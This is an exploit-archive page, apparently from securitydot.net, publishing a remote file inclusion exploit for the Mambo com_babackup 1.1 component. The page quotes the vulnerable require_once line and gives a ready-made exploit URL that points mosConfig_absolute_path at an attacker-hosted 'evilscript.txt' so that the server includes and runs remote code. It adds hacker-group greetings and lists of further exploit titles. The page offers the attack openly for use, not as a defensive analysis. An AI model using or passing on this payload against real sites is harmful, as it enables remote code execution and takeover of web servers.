exploits , vulnerabilities , articles , mambo com_babackup Component <= 1.1 File Include Vulnerability

2007-04-15 Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability
2007-04-12 Mambo Module Calendar (Agenda) 1.5.5 RFI Vulnerability
2007-04-12 Mambo Module Weather (absolute_path) RFI Vulnerability
2007-04-12 TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns
2007-04-12 Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities
2007-04-11 Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

2006-08-19

mambo com_babackup Component <= 1.1 File Include Vulnerability

Rated as : Moderate Risk
####################################################
#                                                  #
#         C Y BE R - W A R R i O R   T I M         #
#                                                  #
####################################################

mambo com_babackup (1.1) Component (mosConfig_absolute_path) Remote File
Inclusion Vulnerabilities

####################################################

Author: mdx

####################################################

Class : Remote

####################################################

cont@ct: bilkopat[at]hotmail[dot]com

####################################################

Code: Tar.php?

require_once( $GLOBALS['mosConfig_absolute_path'] . 
'/administrator/components/com_babackup/classes/PEAR.php' );


Exploit:
http://www.site.com/[path]/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

####################################################

Greetz: Cyber-warrior TIM USERS
####################################################

download link:
http://mamboxchange.com/frs/download.php/5072/com_babackup_1.1.zip
securitydot.net - 2006-08-19

Exploits - newest 10 RSS | More

2007-06-15 57303 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34225 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42451 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29348 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19782 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16716 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19423 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16603 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33623 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17244 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit